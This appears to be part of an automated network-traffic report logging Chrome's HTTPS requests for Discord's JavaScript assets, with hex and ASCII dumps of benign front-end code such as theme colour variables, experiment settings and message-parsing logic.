                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 73 73 4e 61 6d 65 3a 61 2c 63 6f 6c 6f 72 3a 5f 3d 52 2e 64 65 66 61 75 6c 74 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 41 43 54 49 56 45 2c 73 68 61 70 65 3a 45 3d 54 2e 52 4f 55 4e 44 2c 64 69 73 61 62 6c 65 43 6f 6c 6f 72 3a 6f 3d 21 31 2c 73 74 79 6c 65 3a 4f 2c 2e 2e 2e 4e 7d 3d 72 3b 72 65 74 75 72 6e 28 30 2c 65 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 28 61 2c 6e 2e 63 69 72 63 6c 65 42 61 64 67 65 2c 45 29 2c 73 74 79 6c 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 6f 3f 76 6f 69 64 20 30 3a 5f 2c 2e 2e 2e 4f 7d 2c 2e 2e 2e 4e 7d 29 7d 7d 2c 31 37 31 32 31 30 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 61 2c 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 5f 2e 72 28 61 29 2c 5f 2e 64 28 61 2c 7b 64 65 66 61 75 6c
                                                                          Data Ascii: ssName:a,color:_=R.default.INTERACTIVE_ACTIVE,shape:E=T.ROUND,disableColor:o=!1,style:O,...N}=r;return(0,e.jsx)("div",{className:t(a,n.circleBadge,E),style:{backgroundColor:o?void 0:_,...O},...N})}},171210:function(r,a,_){"use strict";_.r(a),_.d(a,{defaul
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 43 45 4e 54 3d 22 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 6d 6f 64 69 66 69 65 72 2d 61 63 63 65 6e 74 29 22 2c 65 2e 42 41 43 4b 47 52 4f 55 4e 44 5f 4d 4f 44 49 46 49 45 52 5f 41 43 43 45 4e 54 5f 32 3d 22 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 6d 6f 64 69 66 69 65 72 2d 61 63 63 65 6e 74 2d 32 29 22 2c 65 2e 42 41 43 4b 47 52 4f 55 4e 44 5f 4d 4f 44 49 46 49 45 52 5f 41 43 54 49 56 45 3d 22 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 6d 6f 64 69 66 69 65 72 2d 61 63 74 69 76 65 29 22 2c 65 2e 42 41 43 4b 47 52 4f 55 4e 44 5f 4d 4f 44 49 46 49 45 52 5f 48 4f 56 45 52 3d 22 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 6d 6f 64 69 66 69 65 72 2d 68 6f 76 65 72 29 22 2c 65 2e 42 41 43 4b 47 52 4f 55 4e 44 5f 4d 4f 44 49
                                                                          Data Ascii: CENT="var(--background-modifier-accent)",e.BACKGROUND_MODIFIER_ACCENT_2="var(--background-modifier-accent-2)",e.BACKGROUND_MODIFIER_ACTIVE="var(--background-modifier-active)",e.BACKGROUND_MODIFIER_HOVER="var(--background-modifier-hover)",e.BACKGROUND_MODI
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 70 6f 72 74 65 72 2d 6d 6f 64 61 6c 2d 73 75 62 6d 69 74 74 69 6e 67 2d 62 61 63 6b 67 72 6f 75 6e 64 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 43 52 45 41 54 4f 52 5f 52 45 56 45 4e 55 45 5f 42 41 43 4b 47 52 4f 55 4e 44 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 63 72 65 61 74 6f 72 2d 72 65 76 65 6e 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 44 41 4e 47 45 52 5f 42 41 43 4b 47 52 4f 55 4e 44 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 64 61 6e 67 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 44 41 4e 47 45 52 5f 42 41 43 4b 47 52 4f 55 4e 44 5f 41 43 54 49 56 45 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 64 61 6e 67 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 61 63 74 69 76 65 29 22 2c 65 2e 42
                                                                          Data Ascii: porter-modal-submitting-background)",e.BUTTON_CREATOR_REVENUE_BACKGROUND="var(--button-creator-revenue-background)",e.BUTTON_DANGER_BACKGROUND="var(--button-danger-background)",e.BUTTON_DANGER_BACKGROUND_ACTIVE="var(--button-danger-background-active)",e.B
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 45 5f 44 41 4e 47 45 52 5f 42 4f 52 44 45 52 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2d 62 6f 72 64 65 72 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 4f 55 54 4c 49 4e 45 5f 44 41 4e 47 45 52 5f 42 4f 52 44 45 52 5f 41 43 54 49 56 45 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2d 62 6f 72 64 65 72 2d 61 63 74 69 76 65 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 4f 55 54 4c 49 4e 45 5f 44 41 4e 47 45 52 5f 42 4f 52 44 45 52 5f 48 4f 56 45 52 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2d 62 6f 72 64 65 72 2d 68 6f 76 65 72 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 4f 55 54 4c 49 4e 45 5f 44 41 4e 47 45 52 5f 54 45 58 54 3d 22 76 61 72 28 2d 2d 62
                                                                          Data Ascii: E_DANGER_BORDER="var(--button-outline-danger-border)",e.BUTTON_OUTLINE_DANGER_BORDER_ACTIVE="var(--button-outline-danger-border-active)",e.BUTTON_OUTLINE_DANGER_BORDER_HOVER="var(--button-outline-danger-border-hover)",e.BUTTON_OUTLINE_DANGER_TEXT="var(--b
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 54 4c 49 4e 45 5f 50 52 49 4d 41 52 59 5f 42 41 43 4b 47 52 4f 55 4e 44 5f 48 4f 56 45 52 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 68 6f 76 65 72 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 4f 55 54 4c 49 4e 45 5f 50 52 49 4d 41 52 59 5f 42 4f 52 44 45 52 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 62 6f 72 64 65 72 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 4f 55 54 4c 49 4e 45 5f 50 52 49 4d 41 52 59 5f 42 4f 52 44 45 52 5f 41 43 54 49 56 45 3d 22 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 62 6f 72 64 65 72 2d 61 63 74 69 76 65 29 22 2c 65 2e 42 55 54 54 4f 4e 5f 4f 55 54 4c 49 4e 45 5f 50 52
                                                                          Data Ascii: TLINE_PRIMARY_BACKGROUND_HOVER="var(--button-outline-primary-background-hover)",e.BUTTON_OUTLINE_PRIMARY_BORDER="var(--button-outline-primary-border)",e.BUTTON_OUTLINE_PRIMARY_BORDER_ACTIVE="var(--button-outline-primary-border-active)",e.BUTTON_OUTLINE_PR
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 2c 65 2e 43 41 52 44 5f 53 45 43 4f 4e 44 41 52 59 5f 42 47 3d 22 76 61 72 28 2d 2d 63 61 72 64 2d 73 65 63 6f 6e 64 61 72 79 2d 62 67 29 22 2c 65 2e 43 41 52 44 5f 53 45 43 4f 4e 44 41 52 59 5f 50 52 45 53 53 45 44 5f 42 47 3d 22 76 61 72 28 2d 2d 63 61 72 64 2d 73 65 63 6f 6e 64 61 72 79 2d 70 72 65 73 73 65 64 2d 62 67 29 22 2c 65 2e 43 48 41 4e 4e 45 4c 5f 49 43 4f 4e 3d 22 76 61 72 28 2d 2d 63 68 61 6e 6e 65 6c 2d 69 63 6f 6e 29 22 2c 65 2e 43 48 41 4e 4e 45 4c 5f 54 45 58 54 5f 41 52 45 41 5f 50 4c 41 43 45 48 4f 4c 44 45 52 3d 22 76 61 72 28 2d 2d 63 68 61 6e 6e 65 6c 2d 74 65 78 74 2d 61 72 65 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 29 22 2c 65 2e 43 48 41 4e 4e 45 4c 53 5f 44 45 46 41 55 4c 54 3d 22 76 61 72 28 2d 2d 63 68 61 6e 6e 65 6c 73 2d 64
                                                                          Data Ascii: ,e.CARD_SECONDARY_BG="var(--card-secondary-bg)",e.CARD_SECONDARY_PRESSED_BG="var(--card-secondary-pressed-bg)",e.CHANNEL_ICON="var(--channel-icon)",e.CHANNEL_TEXT_AREA_PLACEHOLDER="var(--channel-text-area-placeholder)",e.CHANNELS_DEFAULT="var(--channels-d
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 76 61 72 28 2d 2d 64 65 70 72 65 63 61 74 65 64 2d 63 61 72 64 2d 65 64 69 74 61 62 6c 65 2d 62 67 29 22 2c 65 2e 44 45 50 52 45 43 41 54 45 44 5f 51 55 49 43 4b 53 57 49 54 43 48 45 52 5f 49 4e 50 55 54 5f 42 41 43 4b 47 52 4f 55 4e 44 3d 22 76 61 72 28 2d 2d 64 65 70 72 65 63 61 74 65 64 2d 71 75 69 63 6b 73 77 69 74 63 68 65 72 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 29 22 2c 65 2e 44 45 50 52 45 43 41 54 45 44 5f 51 55 49 43 4b 53 57 49 54 43 48 45 52 5f 49 4e 50 55 54 5f 50 4c 41 43 45 48 4f 4c 44 45 52 3d 22 76 61 72 28 2d 2d 64 65 70 72 65 63 61 74 65 64 2d 71 75 69 63 6b 73 77 69 74 63 68 65 72 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 29 22 2c 65 2e 44 45 50 52 45 43 41 54 45 44 5f 53 54 4f 52 45 5f 42 47 3d 22 76 61 72 28
                                                                          Data Ascii: var(--deprecated-card-editable-bg)",e.DEPRECATED_QUICKSWITCHER_INPUT_BACKGROUND="var(--deprecated-quickswitcher-input-background)",e.DEPRECATED_QUICKSWITCHER_INPUT_PLACEHOLDER="var(--deprecated-quickswitcher-input-placeholder)",e.DEPRECATED_STORE_BG="var(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          264192.168.2.549999162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/48590.30373425cc01194cd313.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RZZse.6bbxsMOJ1oPVCsZDXtOAY_lqb8p879sJhPwp4-1702226712142-0-604800000
                                                                          2023-12-10 16:45:13 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 37 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 63 35 65 31 37 38 64 63 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 32377Connection: closeCF-Ray: 8336f4fc5e178dcd-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC384INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 38 35 39 30 22 5d 2c 7b 37 37 32 30 35 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 43 6c 79 64 65 45 78 70 65 72 69 6d 65 6e 74 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6c 2c 72 2c 61 3d 6e 28 22 38 36 32 32 30 35 22 29 3b 28 6c 3d 72 7c 7c 28 72 3d 7b 7d 29 29 5b 6c 2e 4e 6f 6e 65 3d 30 5d 3d 22 4e 6f 6e 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["48590"],{772051:function(e,t,n){"use strict";n.r(t),n.d(t,{ClydeExperimentState:function(){return r},default:function(){return u}});var l,r,a=n("862205");(l=r||(r={}))[l.None=0]="None
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 3b 6c 65 74 20 69 3d 28 30 2c 61 2e 63 72 65 61 74 65 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6b 69 6e 64 3a 22 67 75 69 6c 64 22 2c 69 64 3a 22 32 30 32 33 2d 30 33 5f 63 6c 79 64 65 5f 61 69 22 2c 6c 61 62 65 6c 3a 22 43 6c 79 64 65 41 49 22 2c 64 65 66 61 75 6c 74 43 6f 6e 66 69 67 3a 7b 65 78 70 65 72 69 6d 65 6e 74 53 74 61 74 65 3a 30 7d 2c 74 72 65 61 74 6d 65 6e 74 73 3a 5b 7b 69 64 3a 31 2c 6c 61 62 65 6c 3a 22 45 6e 61 62 6c 65 64 20 28 44 65 66 61 75 6c 74 20 4f 66 66 29 22 2c 63 6f 6e 66 69 67 3a 7b 65 78 70 65 72 69 6d 65 6e 74 53 74 61 74 65 3a 32 7d 7d 2c 7b 69 64 3a 33 2c 6c 61 62 65 6c 3a 22 45 6e 61 62 6c 65 64 20 28 44 65 66 61 75 6c 74 20 4f 6e 29 22 2c 63 6f 6e 66 69 67 3a 7b 65 78 70 65 72 69 6d 65 6e 74 53 74 61 74 65 3a 31 7d 7d 2c
                                                                          Data Ascii: ;let i=(0,a.createExperiment)({kind:"guild",id:"2023-03_clyde_ai",label:"ClydeAI",defaultConfig:{experimentState:0},treatments:[{id:1,label:"Enabled (Default Off)",config:{experimentState:2}},{id:3,label:"Enabled (Default On)",config:{experimentState:1}},
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 67 75 6d 65 6e 74 73 5b 32 5d 3a 22 31 65 39 63 63 63 5f 31 22 2c 72 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 69 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 22 2c 69 3d 61 2e 64 65 66 61 75 6c 74 2e 75 73 65 45 78 70 65 72 69 6d 65 6e 74 28 7b 67 75 69 6c 64 49 64 3a 72 2c 6c 6f 63 61 74 69 6f 6e 3a 6c 7d 2c 7b 61 75 74 6f 54 72 61 63 6b 45 78 70 6f 73 75 72 65 3a 6e 7d 29 2e 65 78 70 65 72 69 6d 65 6e 74 53 74 61 74 65 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 2c 6e 3d 61 72 67 75 6d 65 6e 74
                                                                          Data Ascii: guments[2]:"1e9ccc_1",r=null!==(t=null==e?void 0:e.id)&&void 0!==t?t:"",i=a.default.useExperiment({guildId:r,location:l},{autoTrackExposure:n}).experimentState;return i}function d(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=argument
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 75 72 6e 21 31 3b 6c 65 74 20 6e 3d 65 2e 69 64 3b 72 65 74 75 72 6e 20 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 43 6f 6e 66 69 67 28 7b 67 75 69 6c 64 49 64 3a 6e 2c 6c 6f 63 61 74 69 6f 6e 3a 22 31 65 39 63 63 63 5f 34 22 7d 2c 7b 61 75 74 6f 54 72 61 63 6b 45 78 70 6f 73 75 72 65 3a 74 7d 29 2e 65 78 70 65 72 69 6d 65 6e 74 53 74 61 74 65 7d 7d 2c 38 34 38 38 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 43 68 61 6e 6e 65 6c 52 6f 6c 65 53 75 62 73 63 72 69 70 74 69 6f 6e 53 74 61 74 75 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                          Data Ascii: turn!1;let n=e.id;return a.default.getCurrentConfig({guildId:n,location:"1e9ccc_4"},{autoTrackExposure:t}).experimentState}},848848:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return c},getChannelRoleSubscriptionStatus:function(){return
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 20 63 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 31 33 32 37 31 30 22 29 2c 72 3d 6e 2e 6e 28 6c 29 2c 61 3d 6e 28 22 38 36 32 32 30 35 22 29 3b 6c 65 74 20 69 3d 2f 5e 68 74 74 70 73 3a 5c 2f 5c 2f 28 3f 3a 28 3f 3a 6d 65 64 69 61 7c 69 6d 61 67 65 73 29 5c 2e 64 69 73 63 6f 72 64 61 70 70 5c 2e 6e 65 74 7c 28 3f 3a 63 64 6e 5c 2e 64 69 73 63 6f 72 64 61 70 70 5c 2e 63 6f 6d 29 29 5c 2f 61 74 74 61 63 68 6d 65 6e 74 73 5c 2f 5c 64 2b 5c 2f 5c 64 2b 5c 2f 28 5b 41 2d 5a 61 2d 7a 30 2d 39 2e 5f 2d 5d 2a 5b 41 2d 5a 61 2d 7a 30 2d 39 5f 2d 5d 29 28 3f 3a 5b 3f 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 3f 26 3d 5f 2d 5d 2a 29 3f 2f 2c 75 3d 28 30 2c 61 2e 63 72 65 61 74 65 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6b 69 6e 64 3a 22 75 73 65 72 22 2c 69 64 3a 22 32 30 32 33
                                                                          Data Ascii: c}});var l=n("132710"),r=n.n(l),a=n("862205");let i=/^https:\/\/(?:(?:media|images)\.discordapp\.net|(?:cdn\.discordapp\.com))\/attachments\/\d+\/\d+\/([A-Za-z0-9._-]*[A-Za-z0-9_-])(?:[?][a-zA-Z0-9?&=_-]*)?/,u=(0,a.createExperiment)({kind:"user",id:"2023
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 54 65 78 74 29 28 65 2e 6e 61 6d 65 2c 33 32 29 2c 69 63 6f 6e 3a 68 2e 64 65 66 61 75 6c 74 2e 67 65 74 47 75 69 6c 64 49 63 6f 6e 55 52 4c 28 7b 69 64 3a 65 2e 69 64 2c 69 63 6f 6e 3a 65 2e 69 63 6f 6e 2c 73 69 7a 65 3a 34 30 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 29 7b 6c 65 74 20 6e 3b 6c 65 74 20 6c 3d 54 28 28 30 2c 67 2e 74 72 75 6e 63 61 74 65 54 65 78 74 29 28 65 2e 6e 61 6d 65 2c 33 32 29 29 3b 72 65 74 75 72 6e 7b 74 79 70 65 3a 22 63 68 61 6e 6e 65 6c 22 2c 63 6f 6e 74 65 6e 74 3a 5b 6e 3d 22 69 74 61 6c 69 63 73 22 3d 3d 3d 74 3f 7b 74 79 70 65 3a 22 65 6d 22 2c 63 6f 6e 74 65 6e 74 3a 5b 6c 5d 7d 3a 6c 5d 2c 63 68 61 6e 6e 65 6c 54 79 70 65 3a 65 2e 74 79 70 65 2c 69 63 6f 6e 54 79 70 65 3a 65 2e 69 63 6f 6e 54 79 70 65 7d 7d
                                                                          Data Ascii: Text)(e.name,32),icon:h.default.getGuildIconURL({id:e.id,icon:e.icon,size:40})}}function R(e,t){let n;let l=T((0,g.truncateText)(e.name,32));return{type:"channel",content:[n="italics"===t?{type:"em",content:[l]}:l],channelType:e.type,iconType:e.iconType}}
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6f 6e 22 2c 67 75 69 6c 64 49 64 3a 65 2c 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 6d 65 73 73 61 67 65 49 64 3a 6e 2c 6f 72 69 67 69 6e 61 6c 4c 69 6e 6b 3a 72 2c 69 6e 43 6f 6e 74 65 6e 74 3a 6e 75 6c 6c 3d 3d 61 7c 7c 69 3f 6e 75 6c 6c 3a 5b 53 28 61 29 5d 2c 63 6f 6e 74 65 6e 74 3a 5b 52 28 7b 6e 61 6d 65 3a 79 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 55 4e 4b 4e 4f 57 4e 5f 43 48 41 4e 4e 45 4c 2c 74 79 70 65 3a 78 2e 43 68 61 6e 6e 65 6c 54 79 70 65 73 2e 55 4e 4b 4e 4f 57 4e 2c 69 63 6f 6e 54 79 70 65 3a 22 74 65 78 74 22 7d 2c 22 69 74 61 6c 69 63 73 22 29 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 2c 6e 2c 6c 29 7b 69 66 28 21 65 2e 63 61 6e 56 69 65 77 43 68 61 6e 6e 65 6c 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                                          Data Ascii: on",guildId:e,channelId:t,messageId:n,originalLink:r,inContent:null==a||i?null:[S(a)],content:[R({name:y.default.Messages.UNKNOWN_CHANNEL,type:x.ChannelTypes.UNKNOWN,iconType:"text"},"italics")]}}function k(e,t,n,l){if(!e.canViewChannel)return function(e,
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 5b 61 5d 7d 7d 28 61 2c 65 2c 75 2c 6e 75 6c 6c 21 3d 74 29 7d 7d 6c 65 74 20 4e 3d 7b 6f 72 64 65 72 3a 43 2e 64 65 66 61 75 6c 74 2e 6f 72 64 65 72 2c 72 65 71 75 69 72 65 64 46 69 72 73 74 43 68 61 72 61 63 74 65 72 73 3a 5b 22 3c 22 5d 2c 6d 61 74 63 68 3a 65 3d 3e 2f 5e 3c 23 28 5c 64 2b 29 3e 2f 2e 65 78 65 63 28 65 29 2c 70 61 72 73 65 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 6c 3d 65 5b 31 5d 3b 69 66 28 6e 2e 72 65 74 75 72 6e 4d 65 6e 74 69 6f 6e 49 64 73 29 72 65 74 75 72 6e 7b 74 79 70 65 3a 22 63 68 61 6e 6e 65 6c 4d 65 6e 74 69 6f 6e 22 2c 69 64 3a 6c 7d 3b 6c 65 74 20 72 3d 49 28 6c 2c 6e 2e 6d 65 6e 74 69 6f 6e 43 68 61 6e 6e 65 6c 73 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 72 3f 4d 28 6e 75 6c 6c 2c 6c 2c 6e 75 6c
                                                                          Data Ascii: content:[a]}}(a,e,u,null!=t)}}let N={order:C.default.order,requiredFirstCharacters:["<"],match:e=>/^<#(\d+)>/.exec(e),parse(e,t,n){let l=e[1];if(n.returnMentionIds)return{type:"channelMention",id:l};let r=I(l,n.mentionChannels);return null==r?M(null,l,nul
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6e 29 3a 6e 75 6c 6c 3a 6e 75 6c 6c 7d 3b 76 61 72 20 75 3d 69 7d 2c 36 39 33 30 37 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 7d 29 2c 6e 28 22 37 38 31 37 33 38 22 29 3b 76 61 72 20 6c 3d 6e 28 22 36 32 37 34 34 35 22 29 2c 72 3d 6e 2e 6e 28 6c 29 2c 61 3d 6e 28 22 31 33 32 37 31 30 22 29 2c 69 3d 6e 2e 6e 28 61 29 3b 6c 65 74 20 75 3d 2f 5c 6e 7b 32 2c 7d 24 2f 2c 6f 3d 2f 28 3f 3a 5e 7c 5c 6e 29 28 20 2a 29 24 2f 2c 63 3d 22 28 3f 3a 5b 2a 2d 5d 7c 5c 5c 64 2b 5c 5c 2e 29 22 2c 64 3d 22 28 20 2a 29 28 22 2b 63 2b 22 29 20 2b 22 2c 73 3d 52 65 67 45 78 70 28 22 5e 22 2b 64 29 2c
                                                                          Data Ascii: n):null:null};var u=i},693078:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return C}}),n("781738");var l=n("627445"),r=n.n(l),a=n("132710"),i=n.n(a);let u=/\n{2,}$/,o=/(?:^|\n)( *)$/,c="(?:[*-]|\\d+\\.)",d="( *)("+c+") +",s=RegExp("^"+d),


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          265192.168.2.550000162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/86480.ebf8826a7f33e22a6aba.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=bwATnPuetc5_VMaNdwJ0_I5jgXIgH6LKeXH8pjFuGGk-1702226712432-0-604800000
